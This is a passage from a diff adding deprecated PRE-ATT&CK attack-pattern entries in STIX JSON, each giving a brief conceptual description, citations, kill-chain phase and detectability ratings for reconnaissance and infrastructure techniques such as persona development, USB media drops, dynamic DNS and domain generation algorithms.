Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1019", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine physical locations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1282).\n\nPhysical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1282", + "external_id": "T1282" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary searches publicly available sources that list physical locations that cannot be monitored by a defender or are not necessarily monitored (e.g., all IP addresses touching their public web space listing physical locations).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Most corporations now list their locations on public facing websites. Some challenge still exists to find covert or sensitive locations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1059", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b9148981-152a-4a19-95c1-962803f5c9af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine secondary level tactical element", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1244).\n\nThe secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1244", + "external_id": "T1244" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1021", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--91a3735f-817a-4450-8ed4-f05a0f5c3877", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine strategic target", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1241).\n\nAn adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1241", + "external_id": "T1241" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1018", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--6063b486-a247-499b-976a-9de16f4e83bc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop KITs/KIQs", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1227).\n\nLeadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. KITs are an expression of management's intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1227", + "external_id": "T1227" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1004", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop social network persona digital footprint", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1342).\n\nBoth newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1342", + "external_id": "T1342" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + }, + { + "source_name": "RobinSageInterview", + "description": "Joan Goodchild. (2010, July 8). The Robin Sage experiment: Fake profile fools security pros. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1119", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "The only difference between an adversary conducting this technique and a typical user, is the adversary's intent - to target an individual for compromise.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--82bbd209-f516-45e0-9542-4ffbbc2a8717", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Discover new exploits and monitor exploit-provider forums", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1350).\n\nAn exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1350", + "external_id": "T1350" + }, + { + "source_name": "EquationQA", + "description": "Kaspersky Lab. (2015, February). EQUATION GROUP: QUESTIONS AND ANSWERS. Retrieved March 9, 2017.", + "url": "https://www.threatminer.org/_reports/2015/Equation_group_questions_and_answers.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Many public sources exist for this information.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1127", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Discover target logon/email address format", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1255).\n\nEmail addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example if a known email address is first.last@company.com it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1255", + "external_id": "T1255" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Easily determined and not intended to be protected information. Publicly collected and shared repositories of email addresses exist.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Scraping of known email addresses from the target will likely reveal the target standard for address/username format. This information is easily discoverable.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1032", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Disseminate removable media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1379).\n\nRemovable media containing malware can be injected in to a supply chain at large or small scale. It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1379", + "external_id": "T1379" + }, + { + "source_name": "USBMalwareAttacks", + "description": "Sean Carroll. (2010, November 4). USB Malware Attacks On the Rise. Retrieved March 9, 2017." + }, + { + "source_name": "FPDefendNewDomain", + "description": "William J. Lynn III. (2010, September). Defending a New Domain. Retrieved March 9, 2017." + }, + { + "source_name": "ParkingLotUSB", + "description": "Emil Protalinski. (2012, July 11). Criminals push malware by 'losing' USB sticks in parking lots. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "From a technical perspective, detection of an adversary disseminating removable media is not possible as there is no technical element involved until the compromise phase. Most facilities generally do not perform extensive physical security patrols, which would be necessary in order to promptly identify an adversary deploying removable media to be used in an attack.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique by penetration testers to gain access to networks via end users who are innately trusting of newly found or available technology.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1156", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d2c4206a-a431-4494-834d-52944a79e9f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Distribute malicious software development tools", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1394).\n\nAn adversary could distribute malicious software development tools (e.g., compiler) that hide malicious behavior in software built using the tools. (Citation: PA XcodeGhost) (Citation: Reflections on Trusting Trust)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1394", + "external_id": "T1394" + }, + { + "source_name": "PA XcodeGhost", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved April 12, 2017." + }, + { + "source_name": "Reflections on Trusting Trust", + "description": "Ken Thompson. (1984, August). Reflections on Trusting Trust. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Developers could check a hash or signature of their development tools to ensure that they match expected values (e.g., Apple provides instructions of how to do so for its Xcode developer tool), but developers may not always do so.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "The adversary would need to either replace the tools provided at the official download location or influence developers to download the tools from an adversary-controlled third-party download location. Desktop operating systems (e.g., Windows, macOS) are increasingly encouraging use of vendor-provided official app stores to distribute software, which utilize code signing and increase the difficulty of replacing development tools with malicious versions.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1171", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms (DGA)", + "description": "**This technique has been deprecated. Please use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002).**\n\nThe use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. (Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1323", + "url": "https://attack.mitre.org/techniques/T1323" + }, + { + "description": "Damballa Day Before Zero Blog. (2012, March 5). Domain Generation Algorithms (DGA) in Stealthy Malware. Retrieved March 6, 2017.", + "source_name": "DamballaDGA" + }, + { + "description": "Damballa. (n.d.). DGAs in the Hands of Cyber-Criminals Examining The State Of The Art In Malware Evasion Techniques. Retrieved March 6, 2017.", + "source_name": "DambballaDGACyberCriminals" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:06:00.117Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": true, + "x_mitre_old_attack_id": "PRE-T1100", + "x_mitre_version": "2.0", + "x_mitre_difficulty_for_adversary_explanation": "This technique does not require a significant amount of sophistication while still being highly effective. It was popularized by the Conficker worms but is prevalent in crimeware such as Murofet and BankPatch.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "It is possible to detect the use of DGAs; however, defenders have largely not been successful at mitigating the domains because they are generally registered less than an hour before they are used and disposed of within 24 hours.", + "x_mitre_detectable_by_common_defenses": "Partial" + }, + { + "id": "attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain registration hijacking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1326).\n\nDomain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1326", + "external_id": "T1326" + }, + { + "source_name": "ICANNDomainNameHijacking", + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", + "url": "https://www.icann.org/groups/ssac/documents/sac-007-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1103", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Requires adversary to gain access to an email account for person listed as the domain registrar/POC. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or take advantage of renewal process gaps.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Generally not easily detectable unless domain registrar provides alerting on any updates.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dumpster dive", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1286).\n\nDumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. (Citation: FriedDumpsters)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1286", + "external_id": "T1286" + }, + { + "source_name": "FriedDumpsters", + "description": "Robert B. Fried. (n.d.). Dumpsters: Beware of Treasures. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Strong physical security and monitoring will detect this behavior if performed on premises.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Not difficult if waste is placed in an unsecured or minimally secured area before collection.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1063", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1311).\n\nDynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. (Citation: DellMirage2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1311", + "external_id": "T1311" + }, + { + "source_name": "DellMirage2012", + "description": "DELL SECUREWORKS COUNTER THREAT UNIT THREAT INTELLIGENCE. (2012, September 18). The Mirage Campaign. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know at first use what is valid or hostile traffic without more context. It is possible, however, for defenders to see if the PTR record for an address is hosted by a known DDNS provider. There is potential to assign some level of risk based on this.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Flexible and re-configurable command and control servers, along with deniable ownership and reduced cost of ownership.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1088", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1333).\n\nDynamic DNS is a automated method to rapidly update the domain name system mapping of hostnames to IPs. (Citation: FireEyeSupplyChain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1333", + "external_id": "T1333" + }, + { + "source_name": "FireEyeSupplyChain", + "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know at first use what is valid or hostile traffic without more context.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "It is relatively easy to subscribe to dynamic DNS providers or find ways to get different IP addresses from a cloud provider.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1110", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--78ae433b-289d-4c8d-b8c1-f8de0b7f9090", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Enumerate client configurations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1262).\n\nClient configurations information such as the operating system and web browser, along with additional information such as version or language, are often transmitted as part of web browsing communications. This can be accomplished in several ways including use of a compromised web site to collect details on visiting computers. (Citation: UnseenWorldOfCookies) (Citation: Panopticlick)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1262", + "external_id": "T1262" + }, + { + "source_name": "UnseenWorldOfCookies", + "description": "Joanna Geary, Chris Cross. (2012, April 13). Tracking the trackers: help us reveal the unseen world of cookies. Retrieved March 5, 2017." + }, + { + "source_name": "Panopticlick", + "description": "Electronic Frontier Foundation. (n.d.). Panopticlick: Is your browser safe against tracking?. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Typical information collected as part of accessing web sites (e.g., operating system, browser version, basic configurations).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Basic web scripting capability to collect information of interest on users of interest. Requires a compromised web site and the users of interest to navigate there.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1039", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": 